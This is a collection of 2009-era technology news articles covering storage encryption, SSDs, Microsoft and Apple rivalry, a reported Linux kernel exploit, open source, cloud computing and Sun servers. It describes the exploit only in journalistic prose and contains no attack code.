Brocade's Carreon agrees that fabric-based encryption may be the most suitable location for most customers. "Encryption technologies typically have a serious impact on systems when deployed in software. When encryption is implemented in hardware, the scenario is very different in that you deploy dedicated and highly optimized encryption devices that can deliver from 48 up to 96Gbps of encryption processing, enabling customers to choose to encrypt all data if they desire to do so."

Archive Storage

Another key area for encryption strategy is archiving data that needs to be maintained for adherence to specific industry regulations or for disaster recovery purposes. According to Jered Floyd, CTO of Permabit Technologies (www.permabit.com), this creates an unusual dichotomy. "On one hand, the data has to be retained for years and be readily accessible. On the other, it is often data that needs to be encrypted in case of loss." Floyd suggests that the encryption in this case needs to be handled exclusively by the device because it potentially will outlive any primary storage encryption strategy put in place.

Decommissioning of older storage is another situation where data leaves the building, which can be of concern if the data is replicated to a untrusted environment. "Most disk archive customers will replicate their archive storage to another facility, [but] some of those customers may put that into a hosting facility that is outside of the organization's trusted environment."

In either case, Floyd suggests the strategy of having the encryption intelligence stay with the archive. A storage shelf pulled from the archive is no longer able to see the encryption keys, and as a result, data cannot be read. In the situation where replication is to an untrusted remote site, there should be the option to not replicate the keys, and as a result, data cannot be read by the hosting company's staff.

What To Encrypt?

Beyond protecting data that is leaving the environment, the key decision that most customers need to make is what data to encrypt. According to Brocade's Carreon, "The simplest approach may be to encrypt all the data. Otherwise, any company with requirements for compliance to federal and industry mandates needs an assessment of their data that is typically accomplished through a data classification exercise."

He continues, "Once you identify sensitive data, where it lives, and who owns it, you have to then define the relevant policies for enforcing the encryption and data center security requirements. Products that enable customers to have the flexibility and choice to encrypt all data without any impact to the day-to-day operational environment may be a safer and a simpler approach."

by Chris Mellor

Details of Intel's biggest solid-state drive so far, a 320GB part built on its 34nm process, are popping up across the web.

The current X18-M and X25-M models come in 80GB and 160GB capacities, use 2bits per cell multi-level cell (MLC) technology and are built on a 50nm process. The single-level cell (SLC - one bit per cell) technology X25-E goes faster and has 32GB and 64GB capacities.

Moving to a smaller process technology will enable more SSD dies to be made at a lower cost per die and a higher capacity. Previous reports have noted that Intel could announce doubled capacity SSDs in August and that Intel partner Micron has introduced flash chips using a 34nm process.

A Canadian RedFlagDeals technology website expects an announcement within a week and says there will be 80GB, 160GB and 320GB models. The consumer and mobile PC models will feature a 32MB wear levelling buffer, 90MB/sec sequential write performance, AES 128-bit Encryption, advanced NCQ Features with enhanced performance through status aggregation, and Advanced Smart Support, meaning improved drive statistics to monitor drive life.

Workstation and server models will additionally have a Power Safe write cache and, possibly, faster I/O speed.

RedFlagDeals suggests the 80GB models will be priced in the $276 - $261 area and says the new SSDs will be cheaper than the outgoing ones, being competitive with Samsung SSDs, and faster. Another etailing site suggests €205 for the 80GB X25-M Postville and €405 for the 160GB version, with delivery in up to ten working days.

We might expect generation 2 X25-M and X18-M 80GB, 160GB and 320GB models with 2bit MLC flash. Logically there would also be a gen 2 X25-E variant at 32GB, 64GB and now 128GB capacity levels using SLC flash. ®

by Robert X. Cringely

Some fights are just classics: Ali vs. Frazier. The Jedi Knights vs. The Empire. Godzilla vs. Rodan. And, of course, Microsoft vs. Apple.

Admittedly, there's been a lull in the action over the past decade. Apple essentially ceded the business PC space to Windows, while Microsoft can't make a product consumers actually want to buy no matter how many billions they throw at it. (OK, one: the Xbox. Otherwise, nada.)

Suddenly, though, they're at it hammer and tongs, just like the good old/bad old days. Who's winning? That depends on whom you ask. According to MacWorld's Dan Moren, Microsoft is "running scared":

Apple has gained a lot of traction over the past decade. The iPod pushed the company back into the mainstream, and Cupertino only continued gaining currency as Mac OS X matured and it released some of the slickest machines around. Add in Microsoft's own problems dealing with Windows XP and its less-than-stellar successor, Vista, and Microsoft has started seeming like a non-entity these days.

On the other hand, PC Advisor's Simon Jary suggests Microsoft is now winning against both Apple and Google:

Apple appears rattled. And maybe Google is a little scared now that Microsoft has announced that it is to launch free online versions of its mighty Office applications.... When things looked bleakest for Microsoft the old giant has suddenly roared back to life, and it's Apple and Google who are left looking like frightened little boys just moments after apparently slaying the beast.

My take? Well, people still buy nine Windows machines for every Mac. The big reason? As those "laptop hunters" ads [5] say, you get a lot more for your money from a Windows machine (including frustration). And the message appears to be getting through; a year ago, Apple was the No. 3 PC maker in the United States, according to IDC. Now it's slipped to No. 5.

On the other hand, Microsoft can't make a dent in Apple's stranglehold on the portable music market or touch Apple's technology lead in handsets. But worse than that, consumers love Apple the way they love puppies and ice cream. Aside from a handful of apopletic fanboys [7], people barely tolerate Microsoft. And it's only getting worse. According to VendorRate, Microsoft's customer satisfaction among IT pros dropped like rock over the past three months.

This week at Microsoft's worldwide partner confab in New Orleans, Chief Operating Officer Kevin Turner threw another jab at Apple, sharing this nifty little anecdote:

...two weeks ago we got a call from the Apple legal department saying, "Hey, you need to stop running those ads, we lowered our prices." They took like $100 off or something. It was the greatest single phone call in the history that I've ever taken in business.

I did cartwheels down the hallway. At first I said, "Is this a joke? Who are you?" Not understanding what an opportunity. And so we're just going to keep running them and running them and running them.

As PC World's Nick Mediati notes, Apple did drop its prices in early June, making those "laptop hunter" ads a little off target - the most likely reason Apple's legal beagles gave Turner a jingle. Even at $1,499 instead of $1,799, though, MacBooks still aren't exactly what you would call a steal.

Turner also announced Microsoft was planning to locate its own chain of retail shops in spitting distance of Apple Stores - and, when possible, right next door. That ought to make for an interesting photo op, when there's a line around the block for the next iPhone and the Microsoft store is as quiet as a church.

Microsoft competes with everyone, so it needs to worry about everyone (but mostly about Google). Apple really competes only with itself. Think about it another way: Microsoft is trying to make a comeback in public perception by picking on somebody it's already beating in its primary market by a ratio of almost 10 to 1.

So this battle is really more like Godzilla vs. Bambi. But even if Microsoft manages to squash Apple into a deer-sized pancake, it will never win the battle for the hearts and minds of consumers. Because nobody loves the big scary lizard.

by Tom Espiner

A security researcher has released zero-day code for a flaw in the Linux kernel, saying that it bypasses security protections in the operating system.

The source code for the exploit was made available last week by researcher Brad Spengler on the Dailydave mailing list. According to the researcher, the code exploits a vulnerability in Linux version 2.6.30, and 2.6.18, and affects both 32-bit and 64-bit versions. The 2.6.18 kernel is used in Red Hat Enterprise Linux 5.

The exploit bypasses null pointer de-reference protection in the mainline kernel, which could allow an attacker to gain root control of a system, Spengler wrote.

It also uses arbitrary code execution to disable security features such as auditing, Security-Enhanced Linux (SELinux), AppArmor and Linux Security Module, while making the applications running outside the kernel believe that SELinux is still operating.

In the notes for his source code, Spengler said the exploit is strengthened if SELinux is applied to the operating system. SELinux is a set of modifications that can be applied to the kernel to harden it, by providing a set of security policies.

"Having SELinux enabled actually weakens system security for these kinds of exploits," he wrote.

Security training organization the Sans Institute called the exploit "fascinating." In a blog post on Friday, Sans Institute incident handler Bojan Zdrnja said that the exploit uses the Linux compiler to overcome the security features.

"The compiler will introduce the vulnerability to the binary code, which didn't exist in the source code," wrote Zdrnja. "This will cause the kernel to try to read/write data from 0x00000000, which the attacker can map to userland--and this finally pwns the box."

In his notes on the source code, Spengler said that a workaround would be for administrators to compile the kernel with fno-delete-null-pointer-checks.

by Chris Mellor

Fabless flash controller developer SandForce has let a pricing hint slip. It will reveal more of its plans and situation at the August 11-13 Flash Summit in Santa Clara. It may also be about to reveal its first supply deals.

SandForce emerged from stealth in April with NAND flash solid state disk (SSD) controller technology that used 2-bit multi-level cell flash and delivered pretty symmetric and fast read and write I/O: 30,000 IOPS and 250MB/sec with either reading or writing of 4KB data blocks.

It dealt with the limited write endurance of the flash chips by minimising the amount of written data with its DuraClass technology. The pitch was based on making cheap but limited life-cycle MLC flash practical for enterprise use, and so undercut single level cell (SLC) flash, which is faster and has a longer life than MLC flash.

Back in April (http://www.theregister.co.uk/2009/04/13/sandforce_launches/page2.html) it had evaluation technology and two products, but now pricing hints have emerged. The company is a bronze sponsor and exhibitor at the August Flash Summit in Santa Clara, and is busy hiring staff.

Productwise, SandForce has the SF-1200 mobile processor - processor being its term for controller - and the SF-1500 enterprise processor. These are both application-specific integrated circuits (ASICs) with firmware.

The SF-1500 does 250MB/sec sequential read and sequential write using 128KB blocks of data. It does 30,000 random read and write IOPS with 4KB blocks. Sixteen flash devices, from virtually any flash supplier, can be used, making it possible for OEMs or system integrators to provide various capacity SandForce-controlled SSDs. SLC chips could be used, but that would negate the making-MLC-enterprise-class pitch.

The SF-1200 has pretty much the same bandwidth (250MB/sec read versus 200MB/sec write) but lower IOPS, doing 5,000 IOPS for random 4KB reading and writing.

Pricing hints have come from an article in Greentech Media (http://www.greentechmedia.com/articles/read/a-chip-to-slash-the-power-in-data-centers/), in which SandForce CEO Alex Navqui said SandForce SSD storage could be free if its total cost, acquisition and electricity supply costs over five years are compared with the similar costs of replaced hard drives over the same period. The amount of saved power cost would pay for the SandForce SSDs.

Navqui uses as a comparison a set of 240 73GB fast hard drives, which have a total storage cost/GB of $3.16 or $50,000 over five years. He says you only need nine SandForce SSDs to deliver the same IOPS and they have a 5-year energy cost of $250. Subtracting their cost from the HDD energy cost gives us $49,750, and dividing that by the number of SSDs (nine) gives us an SSD unit cost of $5,527. These will be the SF-1500 processors, with 2-bit flash chips added. We don't know the unit capacity of the SandForce-controlled SSDs.

SandForce processors are intended to be used by SSD suppliers who do not have or do not want their own in-house controller technology. Given that Seagate and SandForce share a board member, C S Park, and that Seagate has reaffirmed its intention to ship its own SSD this year, there is a fairly good likelihood that it could include a SandForce controller.

IBM provided a supporting quote when SandForce came out of stealth in April but it is questionable if IBM wants to become an SSD supplier. It is perhaps more likely that a flash chip supplier, such as Samsung, might use the SandForce technology and so be able to supply system suppliers such as IBM.

Looking at the Flash Summit programme (http://www.flashmemorysummit.com/English/Conference/Seminar_Session_Descriptions.html), we notice that Xiotech's VP for Technology, Rob Peglar, is appearing in several forums. Xiotech announced SSD support in its Magnitude 3D storage arrays in 2006. It is possible that Peglar's appearance at the event may presage some kind of Xiotech SSD announcement.

The usual suspects - Intel, Micron, Numonyx, SanDisk, Samsung, STEC and others - will also be out and about at the Flash Summit, and we might well expect a mini-blizzard of flash announcements at the show.

It's noticeable that enterprise flash disk developer Pliant Technology (http://www.theregister.co.uk/2008/02/21/pliant_startup_decloaking/) does not have a presence at the Flash Summit. There were rumours of a summer announcement by the company, but nothing has come to pass and Pliant looks to be staying in stealth mode for a while longer. ®

by Paul Krill

Adobe Systems will offer more of its Flash rich media application platform up to open source Tuesday, a move viewed by analysts as reactive to the fierce competition Adobe faces in the rich Internet application space from the Microsoft Silverlight platform.

Also in the open source realm Tuesday, Canonical, commercial sponsor of the Ubuntu Linux distribution, will offer code for the Launchpad software development and collaboration platform in an open source format. The Adobe and Canonical contributions follow by one day Microsoft's contribution of 20,000 lines of device driver code for Linux.

Adobe will make available via open source the company's OSMF (Open Source Media Framework) and Text Layout Framework. Formerly part of the "Strobe" project, OSMF allows for software-based media players to be built based on the Flash platform. Individuals could, for example, add new functionality around the Flash Player.

Text Layout Framework allows users to "to do all the things you want to do with text to make it really cool" on the Flash platform, said McAllister. Sophisticated typography capabilities can be added to Web applications.

The two offerings follow previous Adobe efforts to open source parts of the platform. Previous Flash technologies released via open source have included Flex and its compilers, and the Tamarin virtual machine. Specifications also have been released for streaming formats

"People quite often think that the Flash platform is a closed platform, Adobe-only," McAllister said. "What we're doing is continuing this commitment to making the unique features of the Flash platform open."

Although Adobe insisted its latest open source efforts were not done as any sort of response to Microsoft's Silverlight, analysts nonetheless saw a Microsoft angle.

"It's yet another example of the serve and volley going ( on ) in the RIA space," said Jeffrey Hammond, principal analyst for application development at Forrester. "Adobe and Microsoft are pushing each other hard, and as a result, the state of the art for RIAs is advancing at an amazing rate."

"Adobe is in a race with Microsoft for RIAs, and open source is a powerful way for Adobe to level the playing field considering Microsoft's huge mindshare and adoption among developers," said Melissa Webster, program vice president for content and digital media technologies at IDC.

The core Flash Player and Flex Builder IDE remain unavailable to open source. " McAllister said. "There's code inside the Flash Player that we don't own," such as codec technology, he said. Flex Builder, meanwhile, is built atop the open source Eclipse IDE.

Still, developers have more open source options with Adobe than with Silverlight, said Webster. She also cited Adobe's Open Screen Project as an example of openness.

"Yes, the Flash Player remains Adobe-proprietary, however with the Open Screen Project, developers can write their own servers to stream media to the Flash Player," Webster said.

Adobe's OSMF and Text Layout Framework better enable companies to take advantage of capabilities of Flash 10 without having to understand all the "nuts and bolts of low-level ActionScript calls and functions," said Hammond. ActionScript is the programming language for the Flash platform.

Adobe is working with Akamai to coordinate OSMF with Akamai's Open Video Player initiative. The companies will provide a framework enabling partners such as developers and content owners to build new services with high-end features.

Canonical's Launchpad, meanwhile, lets developers host and share code for free using the Bazaar version control system. Developers now can contribute directly to Launchpad themselves.

"Launchpad is designed to accelerate collaboration between open source projects," said Canonical founder Mark Shuttleworth , in a statement released by the company.

"Making Launchpad itself open source fulfills a long term intention to give the users of Launchpad the ability to improve the service they use every day," Shuttleworth said.

While open source projects are hosted for free on Launchpad, closed source projects can use the service for a fee.

by Gordon Haff

We've been hearing a lot about thinner client devices of late. Netbooks are a hot topic, whether or not they're really a distinct category of device. I've wondered if there might not be a role for a sort of ebook-on-steroids. And Google's Chrome OS, pitched for a browser-centric world, had the digerati all in a flutter a few weeks back.

A lot of this activity reflects a general move away from software that is locally installed and run on a traditional PC to software and services housed on servers out on the network--in the cloud, to use the lingo du jour. It's enabled in no small part by increasingly pervasive networks including wireless ones of various kinds.

However, although cloud computing tracks improvements in networks, it doesn't necessarily sync up so cleanly with the parallel improvements going on in computers themselves. As a commenter put it in a recent post of mine: "The thing that I don't understand about the move to "cloud-based services" is that it seems at odds with Moore's Law. Specifically, devices are going to have more & more processing power, disk space & memory - why would you want to offload processing to the cloud?"

This is a deceptively deep comment and one that touches a lot of basic architectural questions about how we will run software and where we will run it.

One thought is that we're not really running counter to Moore's Law. Rather, we're moving the increased number of transistors that Moore's Law gives us from the client to the server. We're making clients thinner (and therefore more portable, cooler, and so forth) and the servers fatter.

There's some truth in that with mobile phones perhaps offering the clearest illustration.

But, for more notebook-like clients there's a lot of processor and graphics horsepower on the local computer that's going to waste much of the time. And, in any case, telecommunications infrastructure places hard limits on bandwidth for a given time of place, but we can dial up and down our local compute horsepower by selecting devices with different characteristics. So it makes more sense to favor local processing much of the time.

In fact, the fundamental thing that thinner clients and cloud computing tackle isn't really the movement of computing off the client but rather the movement of "state" off the client--which is to say data, applications, and customizations specific to a given user.

As a practical matter, most clients still store some amount of state. In the days of old, terminals didn't store anything locally. Sun's Sun Ray line comes closest to replicating this experience in modern thin clients. However, even browsers store cookies and can be configured with extensions and plug-ins that will vary from one installation to the next.

And, for most purposes, this is probably a reasonable enough state of affairs. Our personal devices are personal anyway; we just want to get away from having to load and manage custom software for each individual task that we want to do. Shared, public clients are a different matter, of course. However, in this case, a lowest-common-denominator software load (such as a browser) is typically sufficient.

There is clearly a lot of work left to do and battles, both technical and political, left to fight to arrive at the best architectural models and programming practices for this new generation of client-server computing. For example, do "rich Internet applications" live in the browser a la Microsoft's Silverlight or is a separate framework such as Adobe's AIR a better approach? Where do .NET and Java fit in?

These (and many others) are not small questions. Application writers need to understand at a very granular level the environment for which they're writing. And there is very much a tension between richness of the client experience and the degree to which we can standardize and simplify that client.

by Timothy Prickett Morgan

The executives at server and operating system maker Sun Microsystems have been uncharacteristically quiet since the $5.6bn Oracle deal was announced back in April. And they've been silent since Sun's shareholders approved the deal last Thursday. This - from one of the most aggressive, PR-driven firms on the planet - is a bit disturbing. But Oracle is calling the shots, which is why the IT trade press had to figure out for itself that Sun has actually done a good thing and boosted the clock speeds on its 'Niagara' family of Sparc T2 and T2+ processors.

The Sparc T2 chips, known as 'Niagara-2' internally at Sun, are used in two-socket boxes. The Sparc T2+ chips are used in four-socket machines and are known as 'Victoria Falls.' The Sparc T2 chips came out in August 2007, and the T2+ chips made their debut in October 2008.

Sun has positioned the Sparc T series of chips as leaders in performance per watt, saying it offers better bang for the buck than RISC or Itanium alternatives running Unix. For customers with Sparc-Solaris workloads, the Niagara servers offer compatibility with prior Sun UltraSparc and Fujitsu Sparc64 chips, which means customers do not have to recompile their code for the x64 variant of Solaris 10 to get a competitive entry or midrange Sparc box.

Both Sun and Fujitsu have been reselling Sparc T-based machines for the past two years, just as they both sell bigger Sparc Enterprise machines based on the quad-core Sparc64 VII processors made by Fujitsu. The T2 and T2+ chips have eight cores and eight threads per core, making it the most highly cored and threaded chip in commercial data centers today.

What Sun has not been able to do easily is get the clock speed of the chips up, and that's because it is hitting the same thermal ceiling as other chip makers. According to Sun, a 1.4 GHz Sparc T2 chip with all eight cores being stressed by an application can hit as high as 123 watts, and even during normal loading it hits 95 watts. That's about what a quad-core 'Nehalem EP' Xeon does.

The move from eight-core, four-thread Sparc T1 chips to the eight-core, eight thread T2 chips did not much change in clock speed, although the T2 did has twice as many threads and could be used in two-way machines, which gave systems about twice the oomph on workloads. Specifically, the Sparc T1 topped out at 1.2 GHz and had a 1 GHz variant. The T2 chips had a top speed of 1.4 GHz, with a 1.2 GHz variant for customers who wanted lower thermals and a 900 MHz experimental chip for even lower thermals (such as in blade servers).

Starting today, Sun and its fab partner, Texas Instruments, can deliver Sparc T2 and T2+ chips running at 1.6 GHz. Representatives from Sun were not available as we went to press with this story, so it is unclear if Sun has talked TI into doing some sort of process shrink to get the extra 14.3 per cent increase in clock speed. Considering the financial shape of Sun, it is far more likely that TI is just doing deep sorts on the Sparc T bins to find chips that can run at the higher clock speed. Hopefully, they can do so at a slightly lower voltage than the standard Sparc T2 and T2+ chips and therefore stay within the power budget.

It looks like Sun is also supporting 800 MHz DDR2 main memory in the Sparc T2 and T2+ servers too. Prior machines used 667 MHz DDR2 main memory.

Sun is charging a pretty big premium for the extra Sparc T speed bump. A T5440 server with four 1.4 GHz T2+ chips with all 256 threads activated in the four-socket box, plus 128 GB of memory and two 146 GB disks has a list price of $89,895. Jacking that machine up to four 1.6 GHz T2+ chips with the same hardware otherwise boosts the price to $115,695. That's a 28.7 per cent price hike for 14.3 per cent more clocks. On a two-socket T5240 machine using the 1.4 GHz T2 chips, a machine with 128 threads, 64 GB of memory and two 146 GB disks costs $45,495, but jumping up to the 1.6 GHz chips raises the price by 24.2 per cent to $56,495.

On the single-socket T5220 server, a machine with 64 threads running at 1.4 GHz with 32 GB of memory and two 146 GB disks costs $27,895, and Sun boosts the configuration up to 64 GB with the 1.6 GHz versions of the T2 chip and raises the price to $45,895. It is not clear what Sun is charging for 800 MHz DDR2 memory, but it is around $100 per GB on the street for 667 MHz chips for the T5220. Which means it might be as high as $150 to $200 per GB for Sun list price and then another premium for the higher memory speed. Call it around $8,000 for the incremental memory in the fatter 1.6 GHz configuration of the T5220. That would put the price premium for the 1.6 GHz chips in this single-socket box at around 36 per cent, not including the cost of the extra memory.

This is a lot to pay for extra performance. But that is what all chip makers do with their top bins.

On Tuesday, Sun also updated its Logical Domain (LDom) partitioning technology with release 1.2. The updated LDom software can power down unused Sparc T cores that are not being used and has a new set of built-in configuration tools that make it easier to create and deploy LDoms on the Sparc T machines. (You obviously don't need the faster processors to get the new LDom software, and Sun distributes this LDom code as a patch to the Sparc T systems for free).

The virtual networking support in LDoms now has support for jumbo frames, which makes big file transfers go faster and reduces CPU overhead. Sun has also added domain mobility with LDom 1.2, and presumably, this means that domains can be live migrated between two physical Sparc T boxes. Sun has rolled up a physical-to-virtual converter into LDom 1.2 as well, which speeds up the conversion of applications running on legacy Sparc platforms to virtual ones that can be deployed on the Niagara family of servers.

The LDom 1.1 update came out in November 2008. It included performance enhancements, virtual I/O dynamic reconfiguration, hybrid I/O for network interfaces (allowing a physical NIC to be tied to a virtual machine to boost performance), and virtual disk failover.

LDom is software that should be running on all Sparc servers and should have been on them five years ago because it is something all Sparc machines have needed. It will be interesting to see if LDoms survive the Oracle ax. ®

by Paul Krill

More than 50 companies, academic institutions, and other organizations, including vendors such as Red Hat and Oracle, are banding together to promote use of open source by the federal government via an organization called Open Source for America.

Officially unveiled on Wednesday at the O'Reilly Open Source Convention (OSCON) in San Jose, Calif., the organization is intended to capitalize on federal efforts to be more transparent and collaborative, organization members said. The federal government already has been using open source software, they recognized, but the new organization wants to further that cause.

"Most every federal agency does have open source, but essentially it's a paradigm change," said Tom Rabon, executive vice president for corporate affairs at Red Hat, a key driving member along with Sun Microsystems in forming the organization.

"This organization came about as a result of a number of companies and academic institutions and organizations that believe that there was a void in Washington in terms of having sort of a unified voice for open source," Rabon said.

Immediate goals include educating federal decisions makers about and encouraging government agencies to give equal priority to open source software. Initially, the organization will have no employees; its affairs will be handled by a steering committee of organization members. Over time, there may a staff in Washington.

"We're mainly trying to create awareness right now," Rabon said.

The IT industry has been prone to forming industry-wide organizations for different causes, some with a degree of redundancy. But there has been none specifically for educating the federal government on open source, said Jim Zemlin, executive director of the Linux Foundation, which also is participating in Open Source for America.

Among the missing from Open Source for America is Microsoft. But the company was not asked to participate, Zemlin said.

There currently are no membership fees for Open Source for America, but there may be over time, Rabon said.

Other participants in Open Source for America include Google, Mozilla, Software Freedom Law Center, Alfresco, Advanced Micro Devices, Democracy in Action, Electronic Frontier Foundation, Jaspersoft, Ingres, and Open Source Initiative.

Open Source for America was slated to have a Web site at opensourceforamerica.org.

by Josh Lowensohn

Waiting to get your grubby mitts on Google Wave? You'll have to wait just a little bit longer.

While about 6,000 developers got their hands on Wave Monday, a post on the Google Wave developer blog says the company isn't planning to open it up to everyday users until September 30th. At that time, some 100,000 users will be let into the program. To be a part of that first run, users will have had to have signed up to use the service on Google's invite page.

Along with a hard date on the semi-public beta test, Google also highlighted a few developer creations using Wave's API. One of them, called Waves in WordPress, lets bloggers quickly embed an entire Wave conversation into a blog post, which lets readers view and interact with it. Similar tools that let you do that with other social and blogging can be expected as Wave's API matures.

First introduced at the Google I/O Conference back in late May, Wave is Google's re-imagining of Web e-mail, and a sibling of Gmail--the company's current Web mail product. It blends live chat and e-mail in one service, and is one of Google's most experimental creations yet. Google says it still has some more work to do on the project before it's ready for beta testers to start drumming on it, including how fast and stable it is.

by Timothy Prickett Morgan

There's no question that open source software is helping vendors build utility-style infrastructure - or as the world insists on calling it: cloud computing.

But will cloud computing help the companies behind open source software, who pay their bills by collecting cash for commercial support? Or better still, will it help them stay in business at all?

Good questions. And the Red Hat-sponsored Open Source Cloud Computing Forum held Tuesday aimed to answer this and other questions from the business and technology sides. Technology dominated, but for now, let's just talk about business.

Brian Stevens, Red Hat's vice president of engineering and chief technology officer, kicked off the event with a keynote where he discussed the themes that are over familiar to us all by now:

• That IT is no longer seen as a cost center but as a means of delivering business value, etc.
• That cloud computing - which embodies virtualization and other things that make crusty IT infrastructure more resilient and flexible - would make it so that IT departments could charge back departments for the resources that they use and see a day when they no longer have to schedule downtime as they change hardware or software on their infrastructure.
• That independent software vendors see the inevitability of cloud computing and "are less defensive and are increasingly supporting" the deployment of their applications on clouds.
• That while the service level agreements on public clouds like Amazon's EC2 are good enough for application development and testing and offer substantial speed advantages when it comes to getting a test server up and running for putting code through the paces, the SLAs and the guarantees of security for applications and data deployed on clouds are currently not good enough for the deployment of production enterprise applications. Yet.

The way commercial Linux distributor Red Hat sees it, the move to cloud infrastructure is no worse and perhaps better than the old way of trying to sell into end user accounts directly. It's a lot easier, so the argument goes, to sell future cloud infrastructure makers commercial licenses to its Enterprise Linux stack and cover hundreds, thousands, or even millions of users than it is to sell directly or though a channel into those same accounts.

<p.You make one deal, and in theory, you have sold a buttload of licenses support contracts worth ga-gillions ka-millions. And then companies who have deployed applications on public clouds decide that they want to build similar infrastructure internally on their own private clouds, and you get to sell some more licenses there too.

There are only a few problems with this theory. First, the companies actually selling cloud infrastructure - Amazon, Google, and a handful of others - are not actually using commercial Linux distros (as far as we know) to build out their clouds. That's bad news for all of the server operating system makers (including those who don't sell open source software but rather support contracts), and it's bad news for all the commercial hypervisor makers we've noticed how they never get callbacks when they pitch their wares. In the case of Google, it's even bad news for the server makers. They're left standing at the door because Google makes its own servers.

Both Google and Amazon have essentially created their own Linux distros. And Amazon has its own version of the Xen hypervisor too. As industry analyst Matthew Aslett pointed out after Stevens' keynote, Amazon and Google provide a service based on open source software, so the modifications they make to GPL v2 programs do not have to be given back to the open source community. They would only have to contribute back if they distributed the software.

So while open source has benefited cloud providers, and this loophole in the GPL v2 license (at least from the point of view of people who would like to see Google, Amazon, and others contribute their genius to the community that they have benefited from) has allowed them to keep their intellectual property, it is not so clear that cloud computing is going to help the open source community.

by Jon Brodkin

The Fibre Channel over Ethernet storage protocol may enhance virtualization projects by ensuring greater mobility of virtual machines, and is in the plans of more than a quarter of Fortune 1000 companies, according to new research from TheInfoPro IT consulting firm.

Few companies have begun using FCoE products, which is not a surprise given that FCoE standards have not yet been finalized, says Rob Stevenson, managing director of storage research for TheInfoPro. But storage executives at large enterprises are looking forward to benefits FCoE could bestow on virtualized servers, he says.

The simplified cabling schemes promised by FCoE will reduce the amount of physical work required to move a VM from one server to another, Stevenson says. "If there are less connection points to a virtual machine, you have more mobility," he says. Even in a virtual environment, "there are still physical interfaces beneath the hardware that have to be provisioned properly." TheInfoPro surveyed storage executives from 303 Fortune 1000 companies between November and April for a new report titled "Fibre Channel Over Ethernet: Storage Pro Perspective." A draft FCoE standard was recently approved by a technical committee within the International Committee for Information Technology Standards and submitted for an initial public review.

When asked which applications will benefit the most from FCoE, respondents put virtualized servers at the top, followed by databases, blade servers, backup environments, Microsoft applications, disaster recovery, and data warehouses.

Storage executives generally believe FCoE "will be the dominant storage transport for the future," but adoption today is scarce, the report states. Three percent of respondents are already using FCoE technology, and another 26 percent are either piloting, evaluating or planning to deploy in the near- or long-term. National labs, telco firms and some technology companies are testing out FCoE, but it's not at the point of mainstream adoption, or for use in mission-critical applications, Stevenson notes.

Moving to FCoE offers the advantage of a loss-less protocol, but the unfinished standard does not yet have the expected multi-pathing and load balancing features, according to Stevenson.

FCoE today is therefore like a car that drives, but lacks air bags and rear view mirrors.

"When we talk to enterprises, they need the full arsenal of capabilities," he says.

Even though the standard is unfinished, companies such as Cisco, Brocade, EMC, and NetApp are releasing products to lay the groundwork for an industry-wide move to FCoE.

Brocade, for example, recently unveiled a switch and network adapters that join Fibre Channel over Ethernet and Convergence Enhanced Ethernet (CEE) into one platform, but the company says it does not expect mass adoption until 2011.

Generally, users see NetApp and Cisco as offering the best FCoE technology, Stevenson says. But they are waiting for 10 Gigabit Ethernet to become fully deployed throughout the data center before adopting FCoE, TheInfoPro states. This will take two or three years.

"For the foreseeable future, Fibre Channel will remain the incumbent technology of choice, but FCoE's advantage in terms of cable simplification, lower infrastructure cost and management are positioning it as the next-generation storage fabric," the research firm writes.

by Ina Fried

Technology has the potential to help build smarter, greener cities, but whether it will is another matter.

That was the take-away from a panel discussion Wednesday at Fortune's Brainstorm: Tech conference here.

The need for cities that use less energy is clear. Although cities occupy just 2 percent of the world's geography, they account for 75 percent of the world's greenhouse gas emmissions, according to Clinton Climate Initiative Chairman Ira Magaziner. Cisco Systems CTO Padmasree Warrior noted that there will be 100 new cities with populations of more than 1 million people by 2025.

But while technology has the best potential for allowing society to maintain its standard of living in a sustainable way, the industry isn't necessarily set up to provide such technology.

"We're not there yet as an industry," said Sun Microsystems CTO Greg Papadopoulos. "Our business models are built on complexity."

Technology is also built based on frequent upgrade cycles and getting value from disposability of products. "There's a tension there," he said. "It's going to be a lot harder than you at first think."

Papadopoulos pointed to home automation as an example where the tech industry has failed to recognize the different standards needed in new markets.

"We've failed pretty miserably at that so far," he said. "The are complex and they don't work well. If we follow that model we will fail and we will be cursed."

Hara CEO Amit Chatterjee said that the focus now should be on changes that can be made without major technology shifts, giving solar and other low-carbon technologies a chance to mature.

"There is a unique opportunity to focus on lo hanging fruit or fruit that's on the ground," Chatterjee said. "That is where we need to start. Insulation is a huge win for the U.S. well before we get to solar panels."

Composting locally, he added, creates compressed natural gas that can fuel vehicles.

Chatterjee said that going after the "quick wins" could cut 30 percent of our carbon footprint.

Cutting energy use can also create jobs, the panelists agreed. But only if the right economic incentives are there, such as putting a price on carbon use.

Magaziner said awareness of the issues are improving, but that that isn't enough.

"What we really need is action," he said. "The next three, four, five years are going to be critical."

by Chris Mellor

Try this point of view on for size: there is no general large scale file storage problem. Companies set up to deal with that problem have failed to set the world on fire and over-invested ones, like ONSTor and Copan, are facing difficulties.

Meanwhile, block storage SAN re-invention companies, such as 3PAR and Compellent have done better, showing up the lack of customer need for a panacea for the problem of having too many files and too many large files. The panacea isn't needed because the general problem doesn't exist.

It was not supposed to be like this. Several years ago, engineers, marketeers and entrepreneurs could see a file storage problem looming. The media industry's move from analogue to digital storage was going to create millions, or even billions, of image files, music files and movie files. E-mail use was spreading like a pandemic with overflowing mail boxes, and millions of attachments, many duplicated. Collaborative software like Lotus Domino and SharePoint was causing millions more files to be created.

There was a general and continual rise in the use of unstructured information that needed to be kept, just in case it was needed. It was persistent or reference information and it was held in filer silos, hundreds of them sometimes, located across enterprises, with no co-ordination and no consistent way to search for content. The compliance and eDiscovery dynamics were, and are, often used to strengthen the supposed customer need for these products.

Storage was split into direct-attached storage (DAS) for blocks and files, networked-attached storage (NAS) for files, and storage area networks (SANs) for blocks. SANs were beginning to virtualise the physical storage but there was nothing like that for file storage, NAS being far less consolidated than SANs.

The entrepreneurs, developers and engineers looked at this and saw OPPORTUNITY written large. They started up projects inside storage companies, and even started up new storage companies, to create the next killer storage product. The one that would kick the file storage problem into touch.

Their responses to the problem were different, but hindsight says they all made the mistake of assuming that the problem was larger than it actually turned out to be.

by Roger Grimes

Even the most securely coded piece of software can be susceptible to malicious hacking and significant exploits the moment it's linked with less-secure applications or platforms. These multiproduct, multirole exploits (also known as "chained exploits") are among the most difficult security issues to prevent. In fact, though issues may be known, they can be just as challenging to avert.

